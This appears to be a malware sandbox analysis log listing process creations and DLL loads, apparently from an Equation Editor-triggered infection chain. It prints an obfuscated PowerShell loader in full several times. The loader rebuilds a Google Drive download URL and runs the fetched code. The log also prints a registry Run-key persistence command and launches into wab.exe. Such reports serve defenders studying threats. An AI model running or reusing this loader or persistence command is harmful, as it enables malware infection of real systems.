Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
